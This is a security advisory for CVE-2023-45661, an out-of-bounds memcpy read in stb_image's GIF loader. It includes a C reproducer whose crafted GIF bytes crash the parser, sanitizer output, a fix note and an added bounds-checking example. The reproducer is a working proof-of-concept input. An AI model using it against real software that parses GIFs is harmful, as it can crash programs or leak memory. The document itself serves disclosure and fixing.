GHSL-2023-145/CVE-2023-45661
A crafted image file may trigger out of bounds `memcpy` read in `stbi__gif_load_next`. This happens because `two_back` points to a memory address lower than the start of the buffer `out`.
This issue may be used to leak internal memory allocation information.
To reproduce the issue:
```c
#include <stdint.h>
#define STB_IMAGE_IMPLEMENTATION
#include "../stb_image.h"

int main(int argc, char* argv[])
{
    const uint8_t data[] = {0x47,0x49,0x46,0x38,0x39,0x61,0xbd,0x00,0xdf,0x79,0xa9,0x97,0x53,
                            0x43,0x05,0xff,0xbe,0x21,0x00,0x30,0x03,0x01,0x00,0x21,0x00,0x2c,
                            0x00,0x00,0x00,0x00,0xbd,0x00,0x3f,0x71,0x07,0x00,0x05,0xff,0xbe,
                            0x01,0x00,0x68,0x00,0x21,0xf9,0x04,0x2c,0x0a,0x00,0x1f,0x00,0x2c,
                            0x00,0x00,0x00,0x00,0xbd,0x00,0x71,0x00,0x00,0x05,0xff,0xe0,0x27,
                            0x8e,0x64,0x68};
    size_t size = sizeof(data);
    int x, y, z, channels;
    stbi_uc *img = stbi_load_gif_from_memory(data, size, NULL, &x, &y, &z, &channels, 4);
    stbi_image_free(img);
    return 0;
}
```
```
AddressSanitizer:DEADLYSIGNAL
=================================================================
==34019==ERROR: AddressSanitizer: SEGV on unknown address 0x7efdf91e0ae8 (pc 0x7efe05a0ac23 bp 0x7ffd4ee08700 sp 0x7ffd4ee07ec8 T0)
==34019==The signal is caused by a READ memory access.
    #2 0x4e4156 in stbi__gif_load_next(stbi__context*, stbi__gif*, int*, int, unsigned char*) tests/../stb_image.h:6817:16
    #3 0x4dee75 in stbi__load_gif_main(stbi__context*, int**, int*, int*, int*, int*, int) tests/../stb_image.h:6983:14
    #4 0x4de8bd in stbi_load_gif_from_memory tests/../stb_image.h:1448:30
```
Fix wild address read in stbi__gif_load_next
8cfcbf7
It seems `layers` were forgotten to include in equation. Fixes nothings#1538
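The following is an added example, not code from stb_image or from the fix commit: a simplified model of the pointer arithmetic described in the report, showing why an offset computed without the frame count lands below the buffer and how a caller can validate the range before copying. The function names and the back-to-back frame layout are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed layout (not stb_image's source): `layers` decoded frames sit back
 * to back in one buffer, each `stride` bytes; offsets are from its start. */

/* Frame-two-back offset with `layers` left out: always below the buffer. */
static ptrdiff_t two_back_offset_without_layers(size_t stride)
{
    return -2 * (ptrdiff_t)stride;
}

/* Same offset with `layers` included. Returns 0 on success, -1 when no such
 * frame exists or the multiplication would overflow. */
static int two_back_offset_checked(size_t layers, size_t stride, size_t *off)
{
    if (layers < 2) return -1;
    if (stride != 0 && layers > (size_t)PTRDIFF_MAX / stride) return -1;
    *off = (layers - 2) * stride;
    return 0;
}

/* True when [off, off + len) lies inside a buffer of buf_size bytes. */
static int range_in_buffer(ptrdiff_t off, size_t len, size_t buf_size)
{
    if (off < 0 || (size_t)off > buf_size) return 0;
    return len <= buf_size - (size_t)off;
}

/* Guard to run before copying `stride` bytes from the frame two back. */
static int two_back_is_safe(size_t layers, size_t stride)
{
    size_t off;
    if (two_back_offset_checked(layers, stride, &off) != 0) return 0;
    return range_in_buffer((ptrdiff_t)off, stride, layers * stride);
}

int main(void)
{
    size_t stride = 4 * 16 * 16; /* constructed: 16x16 frame, 4 bytes/pixel */
    ptrdiff_t bad = two_back_offset_without_layers(stride);
    printf("without layers: offset %td, in bounds: %d\n",
           bad, range_in_buffer(bad, stride, 3 * stride));
    printf("with layers=3:  safe: %d\n", two_back_is_safe(3, stride));
    return 0;
}
```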